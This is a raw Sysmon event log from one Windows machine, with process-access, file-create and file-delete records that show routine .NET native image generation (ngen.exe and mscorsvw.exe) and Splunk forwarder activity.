EventID=10 (ProcessAccess) RecordID=20758 RuleName=- UtcTime=2021-06-23 21:04:24.806 SourceProcessGUID={4DB9351A-9DDB-60D3-0500-00000000CF01} SourcePidTid=412432 SourceImage=C:\Windows\system32\csrss.exe TargetProcessGUID={4DB9351A-A1D8-60D3-C003-00000000CF01} TargetProcessId=6296 TargetImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe GrantedAccess=0x1fffff CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f

EventID=10 (ProcessAccess) RecordID=20757 RuleName=- UtcTime=2021-06-23 21:04:24.806 SourceProcessGUID={4DB9351A-A039-60D3-1801-00000000CF01} SourcePidTid=53885396 SourceImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe TargetProcessGUID={4DB9351A-A1D8-60D3-C003-00000000CF01} TargetProcessId=6296 TargetImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe GrantedAccess=0x1fffff CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64)

EventID=11 (FileCreate) RecordID=20756 RuleName=DLL UtcTime=2021-06-23 21:04:24.775 ProcessGuid={4DB9351A-A1D8-60D3-BF03-00000000CF01} ProcessId=7116 Image=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe TargetFilename=C:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1bcc-0\Microsoft.Security.ApplicationId.Wizards.AutomaticRuleGenerationWizard.dll CreationUtcTime=2021-06-23 21:04:24.775

EventID=10 (ProcessAccess) RecordID=20755 RuleName=- UtcTime=2021-06-23 21:04:24.587 SourceProcessGUID={4DB9351A-9DDD-60D3-0C00-00000000CF01} SourcePidTid=844368 SourceImage=C:\Windows\system32\svchost.exe TargetProcessGUID={4DB9351A-A1D8-60D3-BF03-00000000CF01} TargetProcessId=7116 TargetImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe GrantedAccess=0x1000 CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781

EventID=10 (ProcessAccess) RecordID=20754 RuleName=- UtcTime=2021-06-23 21:04:24.556 SourceProcessGUID={4DB9351A-9DDB-60D3-0500-00000000CF01} SourcePidTid=412432 SourceImage=C:\Windows\system32\csrss.exe TargetProcessGUID={4DB9351A-A1D8-60D3-BF03-00000000CF01} TargetProcessId=7116 TargetImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe GrantedAccess=0x1fffff CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f

EventID=10 (ProcessAccess) RecordID=20753 RuleName=- UtcTime=2021-06-23 21:04:24.556 SourceProcessGUID={4DB9351A-A039-60D3-1801-00000000CF01} SourcePidTid=53886420 SourceImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe TargetProcessGUID={4DB9351A-A1D8-60D3-BF03-00000000CF01} TargetProcessId=7116 TargetImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe GrantedAccess=0x1fffff CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)

EventID=23 (FileDelete) RecordID=20752 RuleName=- UtcTime=2021-06-23 21:04:24.525 ProcessGuid={4DB9351A-9DFF-60D3-7600-00000000CF01} ProcessId=3068 User=NT AUTHORITY\SYSTEM Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security Hashes=MD5=45685F56E9CD761AF4D290EC704CB385,SHA256=AD21B269102AC7F483D5BAF59A83AA5000EC960745ECC2A5A41A0452A898B467,IMPHASH=00000000000000000000000000000000 IsExecutable=false Archived=true

EventID=10 (ProcessAccess) RecordID=20751 RuleName=- UtcTime=2021-06-23 21:04:24.509 SourceProcessGUID={4DB9351A-9DDD-60D3-0C00-00000000CF01} SourcePidTid=844368 SourceImage=C:\Windows\system32\svchost.exe TargetProcessGUID={4DB9351A-A1D8-60D3-BE03-00000000CF01} TargetProcessId=2796 TargetImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe GrantedAccess=0x1000 CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781

EventID=10 (ProcessAccess) RecordID=20750 RuleName=- UtcTime=2021-06-23 21:04:24.493 SourceProcessGUID={4DB9351A-9DDB-60D3-0500-00000000CF01} SourcePidTid=412528 SourceImage=C:\Windows\system32\csrss.exe TargetProcessGUID={4DB9351A-A1D8-60D3-BE03-00000000CF01} TargetProcessId=2796 TargetImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe GrantedAccess=0x1fffff CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f

EventID=10 (ProcessAccess) RecordID=20749 RuleName=- UtcTime=2021-06-23 21:04:24.493 SourceProcessGUID={4DB9351A-A039-60D3-1801-00000000CF01} SourcePidTid=53885396 SourceImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe TargetProcessGUID={4DB9351A-A1D8-60D3-BE03-00000000CF01} TargetProcessId=2796 TargetImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe GrantedAccess=0x1fffff CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64)

EventID=11 (FileCreate) RecordID=20748 RuleName=DLL UtcTime=2021-06-23 21:04:24.478 ProcessGuid={4DB9351A-A1D8-60D3-BD03-00000000CF01} ProcessId=7164 Image=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe TargetFilename=C:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1bfc-0\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper.dll CreationUtcTime=2021-06-23 21:04:24.478

EventID=10 (ProcessAccess) RecordID=20747 RuleName=- UtcTime=2021-06-23 21:04:24.431 SourceProcessGUID={4DB9351A-9DDD-60D3-0C00-00000000CF01} SourcePidTid=844368 SourceImage=C:\Windows\system32\svchost.exe TargetProcessGUID={4DB9351A-A1D8-60D3-BD03-00000000CF01} TargetProcessId=7164 TargetImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe GrantedAccess=0x1000 CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781

EventID=10 (ProcessAccess) RecordID=20746 RuleName=- UtcTime=2021-06-23 21:04:24.415 SourceProcessGUID={4DB9351A-9DDB-60D3-0500-00000000CF01} SourcePidTid=412528 SourceImage=C:\Windows\system32\csrss.exe TargetProcessGUID={4DB9351A-A1D8-60D3-BD03-00000000CF01} TargetProcessId=7164 TargetImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe GrantedAccess=0x1fffff CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f

EventID=10 (ProcessAccess) RecordID=20745 RuleName=- UtcTime=2021-06-23 21:04:24.415 SourceProcessGUID={4DB9351A-A039-60D3-1801-00000000CF01} SourcePidTid=53886420 SourceImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe TargetProcessGUID={4DB9351A-A1D8-60D3-BD03-00000000CF01} TargetProcessId=7164 TargetImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe GrantedAccess=0x1fffff CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)

EventID=10 (ProcessAccess) RecordID=20744 RuleName=- UtcTime=2021-06-23 21:04:24.384 SourceProcessGUID={4DB9351A-9DDD-60D3-0C00-00000000CF01} SourcePidTid=844368 SourceImage=C:\Windows\system32\svchost.exe TargetProcessGUID={4DB9351A-A1D8-60D3-BC03-00000000CF01} TargetProcessId=856 TargetImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe GrantedAccess=0x1000 CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781

EventID=10 (ProcessAccess) RecordID=20743 RuleName=- UtcTime=2021-06-23 21:04:24.368 SourceProcessGUID={4DB9351A-9DDB-60D3-0500-00000000CF01} SourcePidTid=412496 SourceImage=C:\Windows\system32\csrss.exe TargetProcessGUID={4DB9351A-A1D8-60D3-BC03-00000000CF01} TargetProcessId=856 TargetImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe GrantedAccess=0x1fffff CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f

EventID=10 (ProcessAccess) RecordID=20742 RuleName=- UtcTime=2021-06-23 21:04:24.368 SourceProcessGUID={4DB9351A-A039-60D3-1801-00000000CF01} SourcePidTid=53885396 SourceImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe TargetProcessGUID={4DB9351A-A1D8-60D3-BC03-00000000CF01} TargetProcessId=856 TargetImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe GrantedAccess=0x1fffff CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64)

EventID=11 (FileCreate) RecordID=20741 RuleName=DLL UtcTime=2021-06-23 21:04:24.337 ProcessGuid={4DB9351A-A1D8-60D3-BB03-00000000CF01} ProcessId=3920 Image=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe TargetFilename=C:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\f50-0\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.dll CreationUtcTime=2021-06-23 21:04:24.337

EventID=10 (ProcessAccess) RecordID=20740 RuleName=- UtcTime=2021-06-23 21:04:24.243 SourceProcessGUID={4DB9351A-9DDD-60D3-0C00-00000000CF01} SourcePidTid=844368 SourceImage=C:\Windows\system32\svchost.exe TargetProcessGUID={4DB9351A-A1D8-60D3-BB03-00000000CF01} TargetProcessId=3920 TargetImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe GrantedAccess=0x1000 CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781

EventID=10 (ProcessAccess) RecordID=20739 RuleName=- UtcTime=2021-06-23 21:04:24.212 SourceProcessGUID={4DB9351A-9DDB-60D3-0500-00000000CF01} SourcePidTid=412496 SourceImage=C:\Windows\system32\csrss.exe TargetProcessGUID={4DB9351A-A1D8-60D3-BB03-00000000CF01} TargetProcessId=3920 TargetImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe GrantedAccess=0x1fffff CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f

EventID=10 (ProcessAccess) RecordID=20738 RuleName=- UtcTime=2021-06-23 21:04:24.212 SourceProcessGUID={4DB9351A-A039-60D3-1801-00000000CF01} SourcePidTid=53886420 SourceImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe TargetProcessGUID={4DB9351A-A1D8-60D3-BB03-00000000CF01} TargetProcessId=3920 TargetImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe GrantedAccess=0x1fffff CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)

EventID=10 (ProcessAccess) RecordID=20737 RuleName=- UtcTime=2021-06-23 21:04:24.166 SourceProcessGUID={4DB9351A-9DDD-60D3-0C00-00000000CF01} SourcePidTid=844368 SourceImage=C:\Windows\system32\svchost.exe TargetProcessGUID={4DB9351A-A1D8-60D3-BA03-00000000CF01} TargetProcessId=4296 TargetImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe GrantedAccess=0x1000 CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781

EventID=10 (ProcessAccess) RecordID=20736 RuleName=- UtcTime=2021-06-23 21:04:24.150 SourceProcessGUID={4DB9351A-9DDB-60D3-0500-00000000CF01} SourcePidTid=412496 SourceImage=C:\Windows\system32\csrss.exe TargetProcessGUID={4DB9351A-A1D8-60D3-BA03-00000000CF01} TargetProcessId=4296 TargetImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe GrantedAccess=0x1fffff CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f

EventID=10 (ProcessAccess) RecordID=20735 RuleName=- UtcTime=2021-06-23 21:04:24.150 SourceProcessGUID={4DB9351A-A039-60D3-1801-00000000CF01} SourcePidTid=53885396 SourceImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe TargetProcessGUID={4DB9351A-A1D8-60D3-BA03-00000000CF01} TargetProcessId=4296 TargetImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe GrantedAccess=0x1fffff CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64)

